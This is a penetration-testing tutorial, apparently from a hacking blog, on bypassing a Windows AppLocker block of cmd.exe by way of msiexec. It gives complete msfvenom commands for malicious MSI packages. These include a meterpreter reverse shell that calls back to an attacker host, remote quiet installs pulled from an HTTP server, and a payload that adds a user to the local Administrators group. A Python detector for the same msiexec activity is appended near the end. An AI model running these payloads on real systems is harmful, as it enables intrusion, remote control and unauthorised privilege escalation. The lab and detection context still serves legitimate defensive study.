Windows Exploitation: msiexec.exe
In our previous article, “Windows AppLocker Policy – A Beginner’s Guide”, we discussed how AppLocker rules define application control policies and how to work with them. Today you will learn how to bypass AppLocker policies. In this post, we have blocked cmd.exe using a Windows AppLocker policy and try to bypass that restriction to get a command prompt.
Table of Contents
Associated file formats where AppLocker is applicable
Challenge 1: Bypass AppLocker with a .msi file to get CMD
A little bit more about MSI files
Multiple methods to get CMD
- Generate a malicious .msi file with Msfvenom - 1st Method
- Generate a malicious .msi file with Msfvenom - 2nd Method
- Generate a malicious .msi file with Msfvenom - 3rd Method
Challenge 2: Make a local user a member of the Administrators Group
- Generate a malicious .msi file with Msfvenom - 4th Method
Associated file formats where AppLocker is applicable
Windows AppLocker is an application control feature introduced in Windows 7 and Windows Server 2008 R2 to restrict the use of unwanted programs. With it, an administrator can restrict the execution of the following kinds of files: executables (.exe, .com), Windows Installer files (.msi, .msp, .mst), scripts (.ps1, .bat, .cmd, .vbs, .js), DLLs (.dll, .ocx) and packaged apps (.appx).
It is entirely up to the system administrator which programs or scripts the AppLocker policy restricts. There could be a situation where Command Prompt (cmd.exe), PowerShell, DLL files, batch files, rundll32.exe, regsvr32.exe, regasm.exe and many more are blocked.
Challenge 1: Bypass AppLocker with a .msi file to get CMD
Let’s suppose you are in a situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restriction.
How, then, can you use an MSI file to bypass these restrictions and get a full-privilege shell?
A little bit more about MSI files
The MSI name comes from the original title of the program, Microsoft Installer; since then the name has changed to Windows Installer. A file with the .msi extension is a Windows Installer package. An installation package contains all the information Windows Installer needs to install or uninstall an application. Each installation package contains a .msi file, which holds an installation database, a summary information stream and data streams for the different parts of the installation.
The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.
The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.
When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click a .msi file, Msiexec.exe runs with that file.
Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.
Multiple methods to get CMD
Generate a malicious .msi file with Msfvenom - 1st Method
Now open a new terminal on the Kali machine and generate a malicious MSI package named cmd.msi that launches the command prompt, using the windows/exec payload, then share it with Python’s built-in HTTP server:
msfvenom -p windows/exec CMD=cmd.exe -f msi > cmd.msi
python -m SimpleHTTPServer 80
Now transfer cmd.msi to your Windows machine to obtain a command prompt shell as administrator. Here we have used the Python HTTP server to share the file over the network.
Once you have downloaded the .msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the MSI file with msiexec.exe from the Run prompt.
Syntax: msiexec /quiet /i <path to .msi>
msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi
As soon as you run the above command from the Run prompt, you get a Command Prompt.
Generate a malicious .msi file with Msfvenom - 2nd Method
Note: Even if you rename cmd.msi to another extension, it still bypasses the rule, because msiexec.exe reads the package contents and does not rely on the file extension.
Repeat the steps above to generate an MSI file with the same msfvenom payload, this time named cmd.png. Since I already had a cmd.msi file on my Kali machine, I renamed it to cmd.png and used the Python server to transfer it.
Once you have downloaded the cmd.png file (which is actually a .msi file) on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run it with msiexec.exe from the Run prompt; note that msiexec can also install a package directly from a URL.
Syntax: msiexec /q /i <path or URL of .msi>
msiexec /q /i http://192.168.1.107/cmd.png
As soon as you run the above command from the Run prompt, you get a Command Prompt.
Generate a malicious .msi file with Msfvenom - 3rd Method
In the above methods we obtained a command prompt with the windows/exec payload; now we use the windows/meterpreter/reverse_tcp payload to get a full-privilege command shell through a meterpreter session.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f msi > shell.msi
Now transfer shell.msi to your Windows machine to obtain a command prompt shell as administrator, and start multi/handler on Kali to catch the connection. Here we have used the Python HTTP server to share the file over the network.
Once you have downloaded shell.msi on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run it with msiexec.exe from the Run prompt.
Syntax: msiexec /q /i <path or URL of .msi>
msiexec /q /i http://192.168.1.107/shell.msi
As soon as you run the above command from the Run prompt, the handler below receives a meterpreter session, and the shell command inside it gives you a Command Prompt.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.107
msf exploit(handler) > set lport 1234
msf exploit(handler) > exploit
meterpreter > shell
Challenge 2: Make a local user a member of the Administrators Group
Let’s suppose you are in a similar situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restriction.
How, then, can you use an MSI file to bypass these restrictions and make a local user a member of the Administrators group when cmd.exe is blocked?
Note: Here aaru is a local user account that is not a member of the Administrators group, as shown below:
Since the AppLocker executable rule blocks cmd.exe on the local machine, we cannot use the command prompt to add aaru to the Administrators group.
Generate a malicious .msi file with Msfvenom - 4th Method
Generate an MSI package named admin.msi with the windows/exec payload, carrying a command that adds the user “aaru” to the local Administrators group on the target machine.
msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi
Now transfer admin.msi to your Windows machine to add aaru to the Administrators group. Here we have used the Python HTTP server to share the file over the network.
Once you have downloaded admin.msi on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run it with msiexec.exe from the Run prompt.
Syntax: msiexec /q /i <path or URL of .msi>
msiexec /q /i http://192.168.1.107/admin.msi
As soon as you run the above command from the Run prompt, you can verify that user aaru has become a member of the Administrators group.
Hopefully it is now clear how a .msi file can be used to compromise a system where cmd.exe and other applications are blocked by the administrator.
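Across Challenge 1 (methods 1 to 3) and Challenge 2 the telemetry a defender sees is the same: msiexec.exe quietly installing a package from a URL, from a user-writable folder or from a file with a non-installer extension, and then spawning cmd.exe or net.exe from the installer's custom action. The Python detector below is an added example, not part of the original post; it runs those checks over constructed Sysmon-style process-creation records whose command lines mirror this post (the record field names image, parent and cmd are assumed).

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style; field names assumed).
# The command lines mirror this post; the last record is a normal vendor install.
EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "msiexec /q /i http://192.168.1.107/cmd.png"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmd": "cmd.exe"},
    {"image": r"C:\Windows\System32\net.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmd": "net localgroup administrators aaru /add"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\svchost.exe",
     "cmd": r'msiexec /i "C:\Program Files\Vendor\setup.msi" /qn'},
]

# /i or /package introduces the package: quoted (group 2) or bare (group 3).
INSTALL_ARG = re.compile(r'(?i)[/-](?:i|package)\s+("([^"]+)"|(\S+))')
QUIET = re.compile(r"(?i)[/-](?:q|qn|qb|quiet)\b")
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")
LOLBINS = {"cmd.exe", "powershell.exe", "net.exe", "net1.exe", "rundll32.exe", "regsvr32.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze(ev):
    """Return every detection reason that applies to one process-creation record."""
    reasons = []
    if basename(ev["image"]) == "msiexec.exe":
        m = INSTALL_ARG.search(ev["cmd"])
        if m:
            target = (m.group(2) or m.group(3)).lower()
            if re.match(r"https?://|ftp://|\\\\", target):
                reasons.append("msiexec installing a package from a remote location")
            if not target.endswith((".msi", ".msp")):
                reasons.append("msiexec package has a non-installer extension")
            if QUIET.search(ev["cmd"]) and target.startswith(USER_WRITABLE):
                reasons.append("quiet msiexec install from a user-writable path")
    # Custom actions run inside msiexec.exe, so a shell or net.exe child is the payload firing.
    if basename(ev["parent"]) == "msiexec.exe" and basename(ev["image"]) in LOLBINS:
        reasons.append(f"Windows Installer spawned {basename(ev['image'])}")
    return reasons

def scan(events):
    """Pair each suspicious command line with its reasons; clean records are dropped."""
    return [(ev["cmd"], r) for ev in events if (r := analyze(ev))]

if __name__ == "__main__":
    for cmd, reasons in scan(EVENTS):
        print(f"{cmd}\n    -> {'; '.join(reasons)}")
```

The vendor install from Program Files is left alone, which is the point: the rules key on where the package comes from and what the installer spawns, not on msiexec.exe itself.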
References:
https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover.
great
Good job mate, keep it up